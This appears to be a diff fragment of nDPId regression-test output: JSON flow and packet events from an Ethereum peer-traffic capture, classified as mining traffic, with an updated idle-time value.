-00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1883,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":2,"flow_last_seen":1578508366047,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508366047,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAAC4GadwzU+0swKgBuHZf3WzP3gWFHaeMd6AScSA1dQAAAgQFrAQCCAppVMVvItiZlwEDAwc="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1884,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":3,"flow_last_seen":1578508366048,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508366048,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGV+TAqAG4M1PtLN1sdl8dp4x3z94FhoAQECzFBwAAAQEICiLYmb1pVMVv"} 
-00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1885,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508366005,"flow_last_seen":1578508366049,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":561,"flow_tot_l4_payload_len":561,"flow_avg_l4_payload_len":140,"midstream":0,"thread_ts_msec":1578508366049,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.83.237.44","src_port":56684,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1886,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":2,"flow_last_seen":1578508366053,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508366053,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQG6OaKOxE6wKgBuHZf3Wh1cVfy7bR73KAScSDVxwAAAgQFrAQCCArYuYPhItiZCQEDAwc="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1887,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":3,"flow_last_seen":1578508366053,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508366053,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG3O7AqAG4ijsROt1odl\/ttHvcdXFX84AQECxkxwAAAQEICiLYmcLYuYPh"} 
-00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1888,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365852,"flow_last_seen":1578508366055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":447,"flow_tot_l4_payload_len":447,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1578508366055,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.59.17.58","src_port":56680,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1889,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":2,"flow_last_seen":1578508366058,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508366058,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADEG0R1YY13bwKgBuHZf3W1kMpWvgknUHaAScSBLTAAAAgQFrAQCCApXTVsMItiZpAEDAwc="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1890,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":3,"flow_last_seen":1578508366058,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508366058,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGwiXAqAG4WGNd291tdl+CSdQdZDKVsIAQECza4gAAAQEICiLYmcZXTVsM"} 
-00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1891,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508366020,"flow_last_seen":1578508366059,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":580,"flow_tot_l4_payload_len":580,"flow_avg_l4_payload_len":145,"midstream":0,"thread_ts_msec":1578508366059,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"88.99.93.219","src_port":56685,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1930,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508366073,"flow_last_seen":1578508366073,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508366073,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"206.189.107.35","src_port":56686,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1930,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1578508366073,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508366073,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGPnfAqAG4zr1rI91udl8AOSk+AAAAALAC\/\/8AywAAAgQFtAEDAwUBAQgKItiZ0wAAAAAEAgAA"} 
-00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1939,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":2,"flow_last_seen":1578508366081,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508366081,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8jPoAACgGJqAN+w7HwKgBuHZf3WZ3LeB+TwsEYqASaN+zCgAAAgQFrAQCCAoTnX6eItiY9AEDAws="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1941,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":3,"flow_last_seen":1578508366081,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508366081,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGW6LAqAG4DfsOx91mdl9PCwRidy3gf4AQECw5oQAAAQEICiLYmdkTnX6e"} -00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1951,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365828,"flow_last_seen":1578508366083,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":404,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1578508366083,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"13.251.14.199","src_port":56678,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1968,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":2,"flow_last_seen":1578508366117,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508366117,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGSnvOvWsjwKgBuHZf3W6FBUsAADkpP6AScSCofQAAAgQFrAQCCApn2sBGItiZ0wEDAwc="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1969,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":3,"flow_last_seen":1578508366117,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508366117,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGPoPAqAG4zr1rI91udl8AOSk\/hQVLAYAQECw4DwAAAQEICiLYmfpn2sBG"} -00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1970,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508366073,"flow_last_seen":1578508366119,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":407,"flow_tot_l4_payload_len":407,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1578508366119,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"206.189.107.35","src_port":56686,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1578508365226,"flow_last_seen":1578508366012,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":539,"flow_tot_l4_payload_len":1302,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.75.171.190","src_port":56657,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00802{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1578508365852,"flow_last_seen":1578508366055,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":447,"flow_tot_l4_payload_len":447,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.59.17.58","src_port":56680,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
-00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":61,"flow_first_seen":1578508365045,"flow_last_seen":1578508365241,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":410,"flow_tot_l4_payload_len":1560,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"185.219.133.62","src_port":56645,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} -00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2000,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1578508365153,"flow_last_seen":1578508365387,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":462,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1578508366135,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"35.228.250.140","src_port":56650,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1835,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508366005,"flow_last_seen":1578508366005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508366005,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.83.237.44","src_port":56684,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1835,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1578508366005,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508366005,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGV9jAqAG4M1PtLN1sdl8dp4x2AAAAALAC\/\/+ZwwAAAgQFtAEDAwUBAQgKItiZlwAAAAAEAgAA"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1857,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508366020,"flow_last_seen":1578508366020,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508366020,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"88.99.93.219","src_port":56685,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1857,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1578508366020,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508366020,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGwhnAqAG4WGNd291tdl+CSdQcAAAAALAC\/\/9XrgAAAgQFtAEDAwUBAQgKItiZpAAAAAAEAgAA"} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1862,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1578508366029,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508366029,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGjuvAqAG4I+nFg909dl+ptEcpAAAAALAC\/\/+KMAAAAgQFtAEDAwUBAQgKItiZrAAAAAAEAgAA"} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1883,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":2,"flow_last_seen":1578508366047,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508366047,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAAC4GadwzU+0swKgBuHZf3WzP3gWFHaeMd6AScSA1dQAAAgQFrAQCCAppVMVvItiZlwEDAwc="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1884,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":3,"flow_last_seen":1578508366048,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508366048,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGV+TAqAG4M1PtLN1sdl8dp4x3z94FhoAQECzFBwAAAQEICiLYmb1pVMVv"} 
+00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1885,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508366005,"flow_last_seen":1578508366049,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":561,"flow_tot_l4_payload_len":561,"flow_avg_l4_payload_len":140,"midstream":0,"thread_ts_msec":1578508366049,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"51.83.237.44","src_port":56684,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1886,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":2,"flow_last_seen":1578508366053,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508366053,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQG6OaKOxE6wKgBuHZf3Wh1cVfy7bR73KAScSDVxwAAAgQFrAQCCArYuYPhItiZCQEDAwc="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1887,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":3,"flow_last_seen":1578508366053,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508366053,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG3O7AqAG4ijsROt1odl\/ttHvcdXFX84AQECxkxwAAAQEICiLYmcLYuYPh"} 
+00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1888,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365852,"flow_last_seen":1578508366055,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":447,"flow_tot_l4_payload_len":447,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1578508366055,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"138.59.17.58","src_port":56680,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1889,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":2,"flow_last_seen":1578508366058,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508366058,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADEG0R1YY13bwKgBuHZf3W1kMpWvgknUHaAScSBLTAAAAgQFrAQCCApXTVsMItiZpAEDAwc="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1890,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":3,"flow_last_seen":1578508366058,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508366058,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGwiXAqAG4WGNd291tdl+CSdQdZDKVsIAQECza4gAAAQEICiLYmcZXTVsM"} 
+00763{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1891,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508366020,"flow_last_seen":1578508366059,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":580,"flow_tot_l4_payload_len":580,"flow_avg_l4_payload_len":145,"midstream":0,"thread_ts_msec":1578508366059,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"88.99.93.219","src_port":56685,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1930,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1578508366073,"flow_last_seen":1578508366073,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1578508366073,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"206.189.107.35","src_port":56686,"dst_port":30303,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1930,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1578508366073,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1578508366073,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGPnfAqAG4zr1rI91udl8AOSk+AAAAALAC\/\/8AywAAAgQFtAEDAwUBAQgKItiZ0wAAAAAEAgAA"} 
+00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1939,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":2,"flow_last_seen":1578508366081,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508366081,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8jPoAACgGJqAN+w7HwKgBuHZf3WZ3LeB+TwsEYqASaN+zCgAAAgQFrAQCCAoTnX6eItiY9AEDAws="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1941,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":3,"flow_last_seen":1578508366081,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508366081,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGW6LAqAG4DfsOx91mdl9PCwRidy3gf4AQECw5oQAAAQEICiLYmdkTnX6e"} +00764{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1951,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508365828,"flow_last_seen":1578508366083,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":404,"flow_tot_l4_payload_len":404,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1578508366083,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"13.251.14.199","src_port":56678,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
+00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1968,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":2,"flow_last_seen":1578508366117,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1578508366117,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGSnvOvWsjwKgBuHZf3W6FBUsAADkpP6AScSCofQAAAgQFrAQCCApn2sBGItiZ0wEDAwc="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1969,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":3,"flow_last_seen":1578508366117,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1578508366117,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGPoPAqAG4zr1rI91udl8AOSk\/hQVLAYAQECw4DwAAAQEICiLYmfpn2sBG"} +00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1970,"source":"ethereum.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1578508366073,"flow_last_seen":1578508366119,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":407,"flow_tot_l4_payload_len":407,"flow_avg_l4_payload_len":101,"midstream":0,"thread_ts_msec":1578508366119,"l3_proto":"ip4","src_ip":"192.168.1.184","dst_ip":"206.189.107.35","src_port":56686,"dst_port":30303,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
